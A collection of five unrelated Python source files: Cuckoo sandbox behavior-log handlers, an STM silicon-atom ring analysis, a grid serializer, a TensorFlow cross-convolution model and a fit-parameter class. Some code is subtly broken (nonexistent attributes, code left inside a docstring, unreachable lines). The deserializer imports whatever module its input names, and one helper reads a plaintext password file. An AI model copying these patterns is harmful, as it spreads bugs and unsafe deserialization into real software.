self.processes = collections.defaultdict(lambda: collections.defaultdict(lambda: 0))
def handle_event(self, event):
self.processes["%d" % event["pid"]][event["api"]] += 1
def run(self):
return self.processes
class RebootInformation(BehaviorHandler):
"""Provides specific information useful for reboot analysis.
In reality this is not a true BehaviorHandler as it doesn't return any
data into the JSON report, but instead it writes a log file which will be
interpreted when doing a reboot analysis.
"""
event_types = ["reboot"]
def __init__(self, *args, **kwargs):
super(RebootInformation, self).__init__(*args, **kwargs)
self.events = []
def handle_event(self, event):
self.events.append((event["time"], event))
def run(self):
reboot_path = os.path.join(self.analysis.analysis_path, "reboot.json")
with open(reboot_path, "wb") as f:
for ts, event in sorted(self.events):
f.write("%s\n" % json.dumps(event))
class ActionInformation(BehaviorHandler):
"""Dumps feedback to the user to improve the sandboxing experience."""
event_types = ["action"]
def __init__(self, *args, **kwargs):
super(ActionInformation, self).__init__(*args, **kwargs)
self.actions = []
def handle_event(self, event):
self.actions.append(event["action"])
def run(self):
for action in set(self.actions):
Database().add_error("", self.analysis.task["id"], action)
class ExtractScripts(BehaviorHandler):
"""Extracts embedded scripts in command-line parameters."""
key = "extracted"
event_types = ["process"]
def __init__(self, *args, **kwargs):
super(ExtractScripts, self).__init__(*args, **kwargs)
self.ex = ExtractManager.for_task(self.analysis.task["id"])
def handle_event(self, process):
self.ex.push_command_line(process["command_line"], process)
def run(self):
pass
class BehaviorAnalysis(Processing):
"""Behavior Analyzer.
The behavior key in the results dict will contain both default content
keys that contain generic / abstracted analysis info, available on any
platform, as well as platform / analyzer specific output.
Typically the analyzer behavior contains some sort of "process" separation
as we're tracking different processes in most cases.
There are several handlers that produce the respective keys / subkeys.
Overall the platform / analyzer specific ones parse / process the captured
data and yield both their own output, but also a standard structure that
is then captured by the "generic" handlers so they can generate the
standard result structures.
The resulting structure contains some iterator onions for the monitored
function calls that stream the content when some sink (reporting,
signatures) needs it, thereby reducing memory footprint.
So hopefully in the end each analysis should be fine with 2 passes over
the results, once during processing (creating the generic output,
summaries, etc) and once during reporting (well once for each report type
if multiple are enabled).
"""
key = "behavior"
def _enum_logs(self):
"""Enumerate all behavior logs."""
if not os.path.exists(self.logs_path):
log.warning("Analysis results folder does not exist at path %r.", self.logs_path)
return
logs = os.listdir(self.logs_path)
if not logs:
log.warning("Analysis results folder does not contain any behavior log files.")
return
for fname in logs:
path = os.path.join(self.logs_path, fname)
if not os.path.isfile(path):
log.warning("Behavior log file %r is not a file.", fname)
continue
limit = config("cuckoo:processing:analysis_size_limit")
if limit and os.stat(path).st_size > limit:
# This needs to be a big alert.
log.critical("Behavior log file %r is too big, skipped.", fname)
continue
yield path
def run(self):
"""Run analysis.
@return: results dict.
"""
self.state = {}
# these handlers will be present for any analysis, regardless of platform/format
handlers = [
GenericBehavior(self),
ProcessTree(self),
Summary(self),
Anomaly(self),
ApiStats(self),
# platform specific stuff
WindowsMonitor(self),
LinuxSystemTap(self),
# Reboot information.
RebootInformation(self),
# User feedback action information.
ActionInformation(self),
# Extracts embedded scripts in the command-line.
ExtractScripts(self),
]
# doesn't really work if there's no task, let's rely on the file name for now
# # certain handlers only makes sense for a specific platform
# # this allows us to use the same filenames/formats without confusion
# if self.task.machine.platform == "windows":
# handlers += [
# WindowsMonitor(self),
# ]
# elif self.task.machine.platform == "linux":
# handlers += [
# LinuxSystemTap(self),
# ]
# create a lookup map
interest_map = {}
for h in handlers:
for event_type in h.event_types:
if event_type not in interest_map:
interest_map[event_type] = []
# If available go for the specific event type handler rather
# than the generic handle_event.
if hasattr(h, "handle_%s_event" % event_type):
fn = getattr(h, "handle_%s_event" % event_type)
interest_map[event_type].append(fn)
elif h.handle_event not in interest_map[event_type]:
interest_map[event_type].append(h.handle_event)
# Each log file should be parsed by one of the handlers. This handler
# then yields every event in it which are forwarded to the various
# behavior/analysis/etc handlers.
for path in self._enum_logs():
for handler in handlers:
# ... whether it is responsible
if not handler.handles_path(path):
continue
# ... and then let it parse the file
for event in handler.parse(path):
# pass down the parsed message to interested handlers
for hhandler in interest_map.get(event["type"], []):
res = hhandler(event)
# We support one layer of "generating" new events,
# which we'll pass on again (in case the handler
# returns some).
if not res:
continue
for subevent in res:
for hhandler2 in interest_map.get(subevent["type"], []):
hhandler2(subevent)
behavior = {}
for handler in handlers:
try:
r = handler.run()
if not r:
continue
behavior[handler.key] = r
except:
log.exception("Failed to run partial behavior class \"%s\"", handler.key)
return behavior
|
|
from sklearn.neighbors import NearestNeighbors
def get_distance(pt1, pt2):
""" Finds the distance between two points. """
x1 = pt1[0]
y1 = pt1[1]
x2 = pt2[0]
y2 = pt2[1]
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** (1 / 2)
class Si():
""" Contains the location of the Si atom, as well as each of the
three rings surrounding it. Objects do not automatically calculate
their locations if you do not tell them to. NOTE: The main
functionality is done in nanometers. Pixel locations are held on to so
they can be easy to grab, but, if you start calling complex methods
with pixel dimensions, you're going to have a bad time. """
""" Public Methods """
def __init__(self, x, y, z, unit):
""" Constructor """
if unit == "nm":
self._nm_location = [x, y, z]
self._pixel_location = [0, 0, 0]
else:
self._pixel_location = [x, y, z]
self._nm_location = [0, 0, 0]
self._rings = []
self._hole_dist = 0 # dist 2 nearest hole, asnd later than constructed
self._d1 = 0
self._d2 = 0
self._d3 = 0
def _findClosestThree(self, ring_list, x_max, y_max, edge_buffer):
if self.is_edge(x_max, y_max, edge_buffer):
return
ring_pos = []
for ring in ring_list:
ring_pos.append(ring.get_nm_location())
nearest = NearestNeighbors(n_neighbors=3, algorithm='ball_tree').fit(ring_pos)
dist, ind = nearest.kneighbors([self.get_nm_location()])
for i in range(len(ind[0])):
self._rings.append(ring_list[ind[0][i]])
def find_rings(self, ring_list, x_max, y_max, edge_buffer):
""" Finds the three rings bordering this Si atom, and stores
them in self._rings.
self._findFirst(ring_list, x_max, y_max, edge_buffer)
print("1st ring found!")
if (len(self.get_rings()) == 1):
self._findSecond(ring_list, x_max, y_max, edge_buffer)
if (len(self.get_rings()) == 2):
self._findThird(ring_list, x_max, y_max, edge_buffer)
print("size: ", len(self._rings))"""
self._findClosestThree(ring_list, x_max, y_max, edge_buffer)
def get_nm_location(self):
""" Returns the location in (x, y, z) form. Units are nm. """
return self._nm_location
def get_pix_location(self):
""" Returns the location in (x, y, z) form. Units are Pixels"""
return self._location
def find_nm_location(self, nm_dim, im_width, im_height):
""" Finds the coordinates in nm when the pixel coordinates are
known. """
scale = (nm_dim[0] / im_width)
for i in range(3):
self._nm_location[i] = scale * self._pixels_location[i]
def find_pix_location(self, nm_dim, im_width, im_height):
""" Finds the coordinates in pixels when the nm coordinates are
known. """
scale = (im_width / nm_dim[0])
for i in range(3):
self._pixel_location[i] = scale * self._location[i]
def get_rings(self):
""" Returns the list of rings bordering the atom. """
return self._rings
def is_edge(self, max_x, max_y, edge_buffer):
""" Determines if this Si atom is on the edge of the image
returns true if so, false otherwise. """
x = self.get_nm_location()[0]
y = self.get_nm_location()[1]
d = edge_buffer
return x < d or x > max_x - d or y < d or y > max_y - d
def assign_hole_dist(self, hole_dist):
self._hole_dist = hole_dist
def get_hole_dist(self):
return self._hole_dist
""" Private Methods """
def _findFirst(self, ring_list, x_max, y_max, edge_buffer):
""" Finds the closest ring center to the atom. If there are
equidistant centers, puts all into self._rings. """
# Excludes any Si atoms that are included as an edge case
if self.is_edge(x_max, y_max, edge_buffer):
return
# Sets an arbitrary number as the first distance. This number
# is used because it will be bigger than any distance
# calculated.
distance = 100000000000000000000
answers = []
for i in range(len(ring_list)):
c1 = ring_list[i].get_nm_location()
c2 = self.get_nm_location()
# Checks if the calculate distance is less than the current
# smallest distance. If so, resets the answer list and adds
# the newest ring.
if get_distance(c1, c2) < distance:
answers = []
answers.append(ring_list[i])
distance = get_distance(c1, c2)
if get_distance(c1, c2) == distance:
answers.append(ring_list[i])
for ring in answers:
self._rings.append(ring)
# print(len(self._rings))
ring.set_atom(self)
self._d1 = distance
def _findSecond(self, ring_list, x_max, y_max, edge_buffer):
""" Finds the second closest ring center to the atom. If there
are equidistant centers, puts all into self._rings. """
if self.is_edge(x_max, y_max, edge_buffer):
return
distance = 100000000000000000000
answers = []
for i in range(len(ring_list)):
c1 = ring_list[i].get_nm_location()
c2 = self.get_nm_location()
dist_2 = get_distance(c1, c2)
if dist_2 < distance and dist_2 > self._d1:
answers = []
answers.append(ring_list[i])
distance = dist_2
if dist_2 == distance and dist_2 > self._d1:
answers.append(ring_list[i])
for ring in answers:
self._rings.append(ring)
ring.set_atom(self)
self._d2 = distance
def _findThird(self, ring_list, x_max, y_max, edge_buffer):
""" Finds the second closest ring center to the atom. """
if self.is_edge(x_max, y_max, edge_buffer):
return
distance = 100000000000000000000
answers = []
for i in range(len(ring_list)):
c1 = ring_list[i].get_nm_location()
c2 = self.get_nm_location()
dist_2 = get_distance(c1, c2)
if dist_2 < distance and dist_2 > self._d2:
answers = []
answers.append(ring_list[i])
distance = dist_2
if dist_2 == distance and dist_2 > self._d2:
answers.append(ring_list[i])
for ring in answers:
self._rings.append(ring)
ring.set_atom(self)
self._d3 = distance
class ring_center():
""" Contains the location of the ring center, and the type of ring
(number of members). Objects do not automatically calculate their
locations if you do not tell them to. NOTE: The main functionality is
done in nanometers. Pixel locations are held on to so they can be easy
to grab, but, if you start calling complex methods with pixel
dimensions, you're going to have a bad time. """
def __init__(self, ring_type, x, y, z, unit):
""" Constructor. """
self._ring_type = ring_type
if unit == "nm":
self._nm_location = [x, y, z]
self._pixel_location = [0, 0, 0]
else:
self._nm_location = [0, 0, 0]
self._pixel_location = [x, y, z]
self._atoms = []
def get_nm_location(self):
""" Returns the location in (x, y, z) form. Units are nm. """
return self._nm_location
def get_pix_location(self):
""" Returns the location in (x, y, z) form. Units are Pixels"""
return self._location
def find_nm_location(self, nm_dim, im_width, im_height):
""" Finds the coordinates in nm when the pixel coordinates are
known. """
scale = (nm_dim[0] / im_width)
for i in range(3):
self._nm_location[i] = scale * self._pixels_location[i]
def find_pix_location(self, nm_dim, im_width, im_height):
""" Finds the coordinates in pixels when the nm coordinates are
known. """
scale = (im_width / nm_dim[0])
for i in range(3):
self._pixel_location[i] = scale * self._location[i]
def change_location(self, x, y, z, unit, nm_dim, im_width, im_height):
""" Changes the coordinates of the center, and finds the coordinates in
the other unit. """
if unit == "nm":
self._nm_location = [x, y, z]
self.find_pix_location(nm_dim, im_width, im_height)
else:
self._pixel_location = [x, y, z]
self.find_nm_location(nm_dim, im_width, im_height)
def get_type(self):
"""returns type of ring"""
return self._ring_type
def set_atom(self, atom):
""" Puts an atom into self._atoms. """
self._atoms.append(atom)
def get_atoms(self):
""" Returns the atom list """
return self._atoms
def remove(self, index):
""" Removes an atom from the atom list BY INDEX """
del self._atoms[index]
class STM():
""" A class to describe the STM image. Includes information like filename,
Image Dimensions (pixels), sample dimensions (nm), scale, number of holes,
and coordinates of those holes."""
def __init__(self, filename, im_dim, sample_dim, num_holes):
""" Constructor. """
self._filename = filename
self._im_dim = im_dim # [image width, image height] (pixels)
self._sample_dim = sample_dim # [sample width, sample height] (nm)
self._scale = im_dim[0] / sample_dim[0] # ratio pixels/nm
self._num_holes = num_holes
self._hole_coords = []
def get_filename(self):
return self._filename
def get_im_dim(self):
return self._im_dim
def get_sample_dim(self):
return self._sample_dim
def get_scale(self):
return self._scale
def get_num_holes(self):
return self._num_holes
def get_hole_coords(self):
return self._hole_coords
def main():
return
main()
|
|
import itertools, importlib
from collections.abc import Mapping
import json
class Lazy_Coord(float):
"""Implements a lazily_evaluated value. Effectively implements a blob
of lazy getattrs that can be done arithmetic on. Not actually used at this
point. (But it works too well to rip out without me feeling sad. : ( )
TODO: Does this really need to be a float subclass? It should work
regardless of what the type that self.function returns. I think I
can generalize to Lazy_Object if I implement the magic methods needed
for non-numerics."""
def __new__(cls, *args, **kwargs):
return super().__new__(cls)#*args, **kwargs)
#Note : To implement thuis, just make sure to calculate the current value
#when doing __mul__, __add__, etc.
def __init__(self, obj, field_name):
super().__init__()
self.object = obj
self.field_name = field_name
self.function = lambda: getattr(self.object, self.field_name)
def __add__(self, other):
sum = Lazy_Coord(self.object, self.field_name)
sum.function = lambda: self.function() + (other.function() if hasattr(other, "function") else other)
return sum
__radd__ = __add__
def __sub__(self, other):
difference = Lazy_Coord(self.object, self.field_name)
difference.function = lambda: self.function() - (other.function() if hasattr(other, "function") else other)
return difference
def __mul__(self, other):
product = Lazy_Coord(self.object, self.field_name)
product.function = lambda: self.function() * (other.function() if hasattr(other, "function") else other)
return product
def __truediv__(self, other):
quotient = Lazy_Coord(self.object, self.field_name)
quotient.function = lambda: self.function() / (other.function() if hasattr(other, "function") else other)
return quotient
def __floordiv__(self, other):
quotient = Lazy_Coord(self.object, self.field_name)
quotient.function = lambda: self.function() // (other.function() if hasattr(other, "function") else other)
return quotient
def __pow__(self, other, mod=None):
#Not exactly the technical term...
raised_thing = Lazy_Coord(self.object, self.field_name)
if mod is None:
raised_thing.function = lambda: self.function() ** (other.function() if hasattr(other, "function") else other)
else:
raised_thing.function = lambda: self.function() ** (other.function() if hasattr(other, "function") else other) % mod
return raised_thing
def __float__(self):
#Haha. I can't believe I forgot to add the mechanism for a lazy number to be converted to a real number.
return float(self.function())
def __int__(self):
return int(self.function())
class Unset_Sentinel:
def __repr__(self):
return type(self).__name__
def __str__(self):
return type(self).__name__
def __hash__(self):
return id(self)
def jsonify(self):
return {"": None}
@classmethod
def dejsonify(cls, json_dict):
return not_set
not_set = Unset_Sentinel()
class Node:
def __init__(self, data=not_set, x=None, y=None):
self.data = data
self.x = x
self.y = y
self.left = self.right = self.up = self.down = None
def __str__(self):
return "Node({data})".format(data=str(self.data))
__repr__ = __str__
def jsonify(self):
cls = type(self.data)
return {"data": self.data,
"data_class": cls.__module__ + "." + cls.__qualname__,
"x": self.x,
"y": self.y}
@classmethod
def dejsonify(cls, json_dict):
x = json_dict["x"]
y = json_dict["y"]
*module_pieces, data_cls = json_dict["data_class"].split(".")
data_cls_module = importlib.import_module(".".join(module_pieces))
data_cls = getattr(data_cls_module, data_cls)
if hasattr(data_cls, "dejsonify"):
data = data_cls.dejsonify(json_dict["data"])
elif data_cls in [str, int, float, bool]:
data = json_dict["data"]
me = cls(data=data, x=x, y=y)
return me
def __eq__(self, other):
return self is other
fields = ["data", "x", "y", "left", "right", "up", "down"]
try:
return all((getattr(self, field) == getattr(other, field) for field in fields))
except AttributeError:
return False
class Grid:
def __init__(self, columns=50, rows=50, nodes=None):
"""Represents an m x n grid of nodes.
Internally implemented as a list of lists. (Sparseness
was considered, but for my usecase, it will always be fully
populated, so it was unnecessary complexity)"""
if nodes is None:
self.nodes = []
for x in range(columns):
self.nodes.append([])
for y in range(rows):
node = Node()
if x > 0:
left = self.nodes[x-1][y]
node.left = left
left.right = node
if y > 0:
down = self.nodes[x][y-1]
node.down = down
down.up = node
node.x = x
node.y = y
self.nodes[x].append(node)
else:
self.nodes = nodes
def __getitem__(self, indices):
#For now, only supporting grid[1,2] syntax
#(I.e. no ellipses or ranges please)
x, y = indices
return self.nodes[x][y]
def __setitem__(self, indices, data):
x, y = indices
if x < 0:
x = len(self.nodes) + x
if y < 0:
y = len(self.nodes[x]) + y
#The main behavior requirements considered for the
#current design:
#O(1) lookup (Not strictly needed, but nice)
#O(1) neighbor lookup (Radial damage, etc)
#O(n) insertion
#(Deletion's performance is irrelevant as I never intend to
#remove from the data structure) (For completeness: all subclasses must
#have O(n) worst case performance here)
#I currently have O(1) for all of these, given that I dropped the sparseness
#design. A sparse list of lists would work with these complexity
#requirements
#Memory requirements are O(n), where n = number of nodes
#(reminder: Constant factors don't matter for O-notation)
#The current design seems to meet these requirements (it exceeds them in fact),
#so I'm not spending further time thinking about it
node = Node(data)
if x > 0:
print(x, y, len(self.nodes))
print(len(self.nodes[x-1]))
left = self.nodes[x-1][y]
node.left = left
if left:
left.right = node
if x < (len(self.nodes) - 1):
right = self.nodes[x+1][y]
node.right = right
if right:
right.left = node
if y > 0:
down = self.nodes[x][y-1]
node.down = down
if down:
down.up = node
if y < (len(self.nodes[x]) - 1):
up = self.nodes[x][y+1]
node.up = up
if up:
up.down = node
node.x = x
node.y = y
self.nodes[x][y] = node
def __iter__(self):
return itertools.chain(*self.nodes)
@property
def columns(self):
return len(self.nodes)
@property
def rows(self):
#Assuming a consistently-sized matrix
return len(self.nodes[0] if self.nodes else [])
def jsonify(self):
return {"nodes": self.nodes}
@classmethod
def dejsonify(cls, json_dict):
nodes = []
for col in json_dict["nodes"]:
column = []
for row in col:
node = Node.dejsonify(row)
column.append(node)
nodes.append(column)
me = Grid(nodes=nodes)
return me
def __str__(self):
return "Grid(columns={cols}, rows={rows})".format(cols=len(self.nodes),
rows=len(self.nodes[0]) if self.nodes else 0)
__repr__ = __str__
def __eq__(self, other):
for node1, node2 in zip(self, other):
if node1.data != node2.data:
print(node1.data, node2.data)
return False
return True
def get_git_password():
f = open("../password.txt")
line = f.readline().strip()
return line
def jsonify(arg):
"""Woo recursion!"""
if hasattr(arg, "jsonify"):
return jsonify(arg.jsonify())
known_types = [str, int, float, bool, type(None)]
if type(arg) in known_types:
return arg
#If it's a mapping
if isinstance(arg, Mapping):
def wrap(item):
return type(arg)(item)
return wrap({jsonify(key): jsonify(value) for (key, value) in arg.items()})
if hasattr(arg, "__iter__"):
def wrap(item):
return type(arg)([item])
if len(arg) > 1:
head, *tail = arg
#Python doesn't do tail-call optimization anyway
#tail is already an iterable due to the star
#(even if it's a single element)
return wrap(jsonify(head)) + jsonify(tail)
elif len(arg) == 1:
return wrap(jsonify(arg[0]))
else:
return wrap([])
raise ValueError("Unbytify-able object: {obj}".format(obj=arg))
def bytify(arg):
return json.dumps(jsonify(arg)).encode("utf-8")
def debytify(byte_string):
string = byte_string.decode("utf-8")
dictionary = json.loads(string)
#This might raise exceptions, but that's fine. (There's no way to elegantly
#handle them here.)
module_name, cls_name = dictionary["name"].rsplit(".", 1)
module = importlib.import_module(module_name)
cls = getattr(module, cls_name)
json_dict = json.loads(string)
return cls.dejsonify(json_dict)
|
|
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Cross Convolutional Model.
https://arxiv.org/pdf/1607.02586v1.pdf
"""
import math
import sys
import tensorflow as tf
slim = tf.contrib.slim
class CrossConvModel(object):
def __init__(self, image_diff_list, params):
"""Constructor.
Args:
image_diff_list: A list of (image, diff) tuples, with shape
[batch_size, image_size, image_size, 3] and image_sizes as
[32, 64, 128, 256].
params: Dict of parameters.
"""
self.images = [i for (i, _) in image_diff_list]
# Move the diff to the positive realm.
self.diffs = [(d + params['scale']) / 2 for (i, d) in image_diff_list]
self.params = params
def Build(self):
with tf.device('/gpu:0'):
with slim.arg_scope([slim.conv2d],
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
normalizer_params={'is_training':
self.params['is_training']}):
self._BuildMotionKernel()
encoded_images = self._BuildImageEncoder()
cross_conved_images = self._CrossConv(encoded_images)
self._BuildImageDecoder(cross_conved_images)
self._BuildLoss()
image = self.images[1]
diff = self.diffs[1]
self.global_step = tf.Variable(0, name='global_step', trainable=False)
if self.params['is_training']:
self._BuildTrainOp()
diff = diff * 2.0 - self.params['scale']
diff_output = self.diff_output * 2.0 - self.params['scale']
concat_image = tf.concat(
axis=1, values=[image, image + diff_output, image + diff, diff_output])
tf.summary.image('origin_predict_expect_predictdiff', concat_image)
self.summary_op = tf.summary.merge_all()
return self.loss
def _BuildTrainOp(self):
lrn_rate = tf.maximum(
0.01, # min_lr_rate.
tf.train.exponential_decay(
self.params['learning_rate'], self.global_step, 10000, 0.5))
tf.summary.scalar('learning rate', lrn_rate)
optimizer = tf.train.GradientDescentOptimizer(lrn_rate)
self.train_op = slim.learning.create_train_op(
self.loss, optimizer, global_step=self.global_step)
def _BuildLoss(self):
# 1. reconstr_loss seems doesn't do better than l2 loss.
# 2. Only works when using reduce_mean. reduce_sum doesn't work.
# 3. It seems kl loss doesn't play an important role.
self.loss = 0
with tf.variable_scope('loss'):
if self.params['l2_loss']:
l2_loss = tf.reduce_mean(tf.square(self.diff_output - self.diffs[1]))
tf.summary.scalar('l2_loss', l2_loss)
self.loss += l2_loss
if self.params['reconstr_loss']:
reconstr_loss = (-tf.reduce_mean(
self.diffs[1] * (1e-10 + self.diff_output) +
(1-self.diffs[1]) * tf.log(1e-10 + 1 - self.diff_output)))
reconstr_loss = tf.check_numerics(reconstr_loss, 'reconstr_loss')
tf.summary.scalar('reconstr_loss', reconstr_loss)
self.loss += reconstr_loss
if self.params['kl_loss']:
kl_loss = (0.5 * tf.reduce_mean(
tf.square(self.z_mean) + tf.square(self.z_stddev) -
2 * self.z_stddev_log - 1))
tf.summary.scalar('kl_loss', kl_loss)
self.loss += kl_loss
tf.summary.scalar('loss', self.loss)
def _BuildMotionKernel(self):
image = self.images[-2]
diff = self.diffs[-2]
shape = image.get_shape().as_list()
assert shape[1] == shape[2] and shape[1] == 128
batch_size = shape[0]
net = tf.concat(axis=3, values=[image, diff])
with tf.variable_scope('motion_encoder'):
with slim.arg_scope([slim.conv2d], padding='VALID'):
net = slim.conv2d(net, 96, [5, 5], stride=1)
net = slim.max_pool2d(net, [2, 2])
net = slim.conv2d(net, 96, [5, 5], stride=1)
net = slim.max_pool2d(net, [2, 2])
net = slim.conv2d(net, 128, [5, 5], stride=1)
net = slim.conv2d(net, 128, [5, 5], stride=1)
net = slim.max_pool2d(net, [2, 2])
net = slim.conv2d(net, 256, [4, 4], stride=1)
net = slim.conv2d(net, 256, [3, 3], stride=1)
z = tf.reshape(net, shape=[batch_size, -1])
self.z_mean, self.z_stddev_log = tf.split(
axis=1, num_or_size_splits=2, value=z)
self.z_stddev = tf.exp(self.z_stddev_log)
epsilon = tf.random_normal(
self.z_mean.get_shape().as_list(), 0, 1, dtype=tf.float32)
kernel = self.z_mean + tf.multiply(self.z_stddev, epsilon)
width = int(math.sqrt(kernel.get_shape().as_list()[1] // 128))
kernel = tf.reshape(kernel, [batch_size, width, width, 128])
with tf.variable_scope('kernel_decoder'):
with slim.arg_scope([slim.conv2d], padding='SAME'):
kernel = slim.conv2d(kernel, 128, [5, 5], stride=1)
self.kernel = slim.conv2d(kernel, 128, [5, 5], stride=1)
sys.stderr.write('kernel shape: %s\n' % kernel.get_shape())
def _BuildImageEncoder(self):
feature_maps = []
for (i, image) in enumerate(self.images):
with tf.variable_scope('image_encoder_%d' % i):
with slim.arg_scope([slim.conv2d, slim.max_pool2d], padding='SAME'):
net = slim.conv2d(image, 64, [5, 5], stride=1)
net = slim.conv2d(net, 64, [5, 5], stride=1)
net = slim.max_pool2d(net, [5, 5])
net = slim.conv2d(net, 64, [5, 5], stride=1)
net = slim.conv2d(net, 32, [5, 5], stride=1)
net = slim.max_pool2d(net, [2, 2])
sys.stderr.write('image_conv shape: %s\n' % net.get_shape())
feature_maps.append(net)
return feature_maps
def _CrossConvHelper(self, encoded_image, kernel):
"""Cross Convolution.
The encoded image and kernel are of the same shape. Namely
[batch_size, image_size, image_size, channels]. They are split
into [image_size, image_size] image squares [kernel_size, kernel_size]
kernel squares. kernel squares are used to convolute image squares.
"""
images = tf.expand_dims(encoded_image, 0)
kernels = tf.expand_dims(kernel, 3)
return tf.nn.depthwise_conv2d(images, kernels, [1, 1, 1, 1], 'SAME')
def _CrossConv(self, encoded_images):
"""Apply the motion kernel on the encoded_images."""
cross_conved_images = []
kernels = tf.split(axis=3, num_or_size_splits=4, value=self.kernel)
for (i, encoded_image) in enumerate(encoded_images):
with tf.variable_scope('cross_conv_%d' % i):
kernel = kernels[i]
encoded_image = tf.unstack(encoded_image, axis=0)
kernel = tf.unstack(kernel, axis=0)
assert len(encoded_image) == len(kernel)
assert len(encoded_image) == self.params['batch_size']
conved_image = []
for j in xrange(len(encoded_image)):
conved_image.append(self._CrossConvHelper(
encoded_image[j], kernel[j]))
cross_conved_images.append(tf.concat(axis=0, values=conved_image))
sys.stderr.write('cross_conved shape: %s\n' %
cross_conved_images[-1].get_shape())
return cross_conved_images
def _Deconv(self, net, out_filters, kernel_size, stride):
shape = net.get_shape().as_list()
in_filters = shape[3]
kernel_shape = [kernel_size, kernel_size, out_filters, in_filters]
weights = tf.get_variable(
name='weights',
shape=kernel_shape,
dtype=tf.float32,
initializer=tf.truncated_normal_initializer(stddev=0.01))
out_height = shape[1] * stride
out_width = shape[2] * stride
batch_size = shape[0]
output_shape = [batch_size, out_height, out_width, out_filters]
net = tf.nn.conv2d_transpose(net, weights, output_shape,
[1, stride, stride, 1], padding='SAME')
slim.batch_norm(net)
return net
def _BuildImageDecoder(self, cross_conved_images):
"""Decode the cross_conved feature maps into the predicted images."""
nets = []
for i, cross_conved_image in enumerate(cross_conved_images):
with tf.variable_scope('image_decoder_%d' % i):
stride = 64 / cross_conved_image.get_shape().as_list()[1]
# TODO(xpan): Alternative solution for upsampling?
nets.append(self._Deconv(
cross_conved_image, 64, kernel_size=3, stride=stride))
net = tf.concat(axis=3, values=nets)
net = slim.conv2d(net, 128, [9, 9], padding='SAME', stride=1)
net = slim.conv2d(net, 128, [1, 1], padding='SAME', stride=1)
net = slim.conv2d(net, 3, [1, 1], padding='SAME', stride=1)
self.diff_output = net
sys.stderr.write('diff_output shape: %s\n' % self.diff_output.get_shape())
|
|
__description__ = \
"""
Main class for holding fit parameters, including guesses, values, ranges, etc.
"""
__date__ = "2016-09-02"
__author__ = "Michael J. Harms"
import copy
import numpy as np
class FitParameter:
"""
Class for storing and manipulating generic fit parameters.
"""
def __init__(self,name,guess=None,guess_range=None,fixed=False,bounds=None,
alias=None):
"""
Initialize class. Parameters:
name: name of parameter (string)
guess: parameter guess (float). If None, class will guess intelligently
based on the parameter name. If no intelligent guess is available,
guess will be set to 1.0.
guess_range: range of reasonable guesses (list-like object of 2 floats).
If None, class will guess intelligently based on parameter
name.
fixed: whether or not the parameter is fixed (bool)
bounds: bounds on fit for parameter (list-like object of 2 floats). If
None, bounds will be set to (None,None). If (None,5), no lower
bound, upper bound of 5.
alias: alias for parameter name, for linking to global paramter names. (str)
If None, no alias is made.
"""
self.name = name
self.guess = guess
self.guess_range = guess_range
self.fixed = fixed
self.bounds = bounds
self.alias = alias
self._initialize_fit_results()
def _initialize_fit_results(self):
"""
Set fit results to start (stdev, ninetyfive, value to guess).
"""
self.value = self.guess
self._stdev = np.inf
self._ninetyfive = [-np.inf,np.inf]
#--------------------------------------------------------------------------
# parameter name
@property
def name(self):
"""
Name of the parameter.
"""
return self._name
@name.setter
def name(self,n):
self._name = str(n)
#--------------------------------------------------------------------------
# parameter value
@property
def value(self):
"""
Value of the parameter.
"""
return self._value
@value.setter
def value(self,v):
"""
If value is set to None, set value to self.guess value.
"""
if v != None:
self._value = v
else:
self._value = self.guess
#--------------------------------------------------------------------------
# parameter stdev
@property
def stdev(self):
"""
Standard deviation on the parameter.
"""
return self._stdev
@stdev.setter
def stdev(self,s):
"""
Set the standard deviation of the parameter.
"""
self._stdev = s
#--------------------------------------------------------------------------
# parameter 95% confidence
@property
def ninetyfive(self):
"""
95% confidence interval on the parameter.
"""
return self._ninetyfive
@ninetyfive.setter
def ninetyfive(self,value):
"""
Set the 95% confidence interval on the parameter.
"""
if len(value) != 2:
err = "ninetyfive requires a list-like with length 2.\n"
raise ValueError(err)
self._ninetyfive[0] = value[0]
self._ninetyfive[1] = value[1]
#--------------------------------------------------------------------------
# parameter guess
@property
def guess(self):
"""
Guess for the parameter.
"""
return self._guess
@guess.setter
def guess(self,g):
"""
Set the guess. If None, choose intelligently based on the name of the
parameter.
"""
if g != None:
self._guess = g
else:
if self.name.startswith("dH"):
self._guess = 1000.0
elif self.name.startswith("beta") or self.name.startswith("K"):
self._guess = 1e6
elif self.name.startswith("fx"):
self._guess = 1.0
else:
self._guess = 1.0
self._value = self._guess
self._initialize_fit_results()
#--------------------------------------------------------------------------
# parameter guess_range
@property
def guess_range(self):
"""
Range of reasonable guesses for the parameter.
"""
return self._guess_range
@guess_range.setter
def guess_range(self,g):
"""
Set range of reasonable guesses. If None, choose reasonable guess range
based on parameter name.
"""
if g != None:
try:
if len(g) != 2:
raise TypeError
except TypeError:
err = "Guess range must be list-like object of length 2.\n"
raise ValueError(err)
self._guess_range = copy.deepcopy(g)
else:
if self.name.startswith("dH"):
self._guess_range = [-10000.0,10000.0]
elif self.name.startswith("beta") or self.name.startswith("K"):
self._guess_range = [1.0,1e8]
elif self.name.startswith("fx"):
self._guess_range = [0.0,2.0]
else:
self._guess_range = [-10000.0,10000.0]
self._initialize_fit_results()
#--------------------------------------------------------------------------
# parameter fixed-ness.
@property
def fixed(self):
"""
Whether or not the parameter if fixed.
"""
return self._fixed
@fixed.setter
def fixed(self,bool_value):
"""
Fix or unfix the parameter.
"""
self._fixed = bool(bool_value)
self._initialize_fit_results()
#--------------------------------------------------------------------------
# bounds for fit.
@property
def bounds(self):
"""
Fit bounds. Either list of bounds or None.
"""
return self._bounds
@bounds.setter
def bounds(self,b):
"""
Set fit bounds.
"""
if b != None:
try:
if len(b) != 2:
raise TypeError
except TypeError:
err = "Bounds must be list-like object of length 2\n"
raise ValueError(err)
self._bounds = tuple(copy.deepcopy(b))
else:
self._bounds = (-np.inf,np.inf)
self._initialize_fit_results()
#--------------------------------------------------------------------------
# parameter alias
@property
def alias(self):
"""
Parameter alias. Either string or None.
"""
return self._alias
